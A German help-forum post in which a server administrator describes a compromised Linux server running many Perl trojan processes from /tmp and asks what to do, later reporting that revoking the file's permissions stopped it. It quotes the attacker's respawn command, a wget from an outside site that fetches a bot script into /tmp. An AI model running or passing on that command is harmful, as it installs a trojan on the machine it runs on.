Hi,

ich habe foglendes Problem seit gestern 15 Uhr wurde der Server immer langsamer weil ungefähr 100 dieser Prozesse "perl /tmp/.sql.err.3913" liefen.

Diese Datei .sql.err.3913 existiert und ist ein Trojaner. Wenn ich die Datei lösche und alle "perl /tmp/.sql.err.3913" Prozesse kille wird über die /usr/sbin/httpd ein wget befehl gestartet der wie folgt aussieht:

DEN `LINK NICHT ANKLICKEN!!!!!!!!!!!

sh -c wget http://www.pivadesign.com.br/rc/linuxdaybot.txt -O /tmp/.sql.err.3913 ...

DEN `LINK NICHT ANKLICKEN!!!!!!!!!!!

Dieser Prozess hat als Überprozess die /usr/sbín/httpd

so dieser tolle prozess oben lädt die datei linuxdaybot.txt herunter. Ich habe mit meinem Top gesicherten windows pc mal diese adresse aufgerufen und sofort hat Der Antivirus ihn erkannnt und unschädlich gemacht er sagte es ist ein Trojaner. Der Befehl da oben lädt die Datei runter und verschiebt sie nach /tmp/.sql.err.3913 wo sie so alle 5 min. erneut ausgeführt wird. In der txt Datei steht perl Quellcode drin

Die Seite http://www.pivadesign.com.br gibts da kommt man auf ne brasilianische webdesign seite. Ich könnte ausrasten wieso hat einer so ne Datei auf seinem Webspace liegen und wie kann ich den Melden das der nen Trojaner auf seinem Server hat den mein Server andauernd runterlädt.

Ich bin total ratlos was soll ich jetzt machen?

Anm.
-----------------------
Aktive Links editiert!

Gruß Cidre
Admin TB

*lol*

jetzt habe ich der runtergeladenen Datei im temp Ordner mal alle rechte entzogen dann die restlichen Prozesse gekillt und siehe da es kommt kein wget befehl mehr und datei wird auch nicht mehr ausgeführt

aber schön ist das trotzdem nicht

angenommen ich würde datei wieder aus dem temp verzeichnnis entfernen gehe ich mal davon aus der spaß dann wieder von vorn losgeht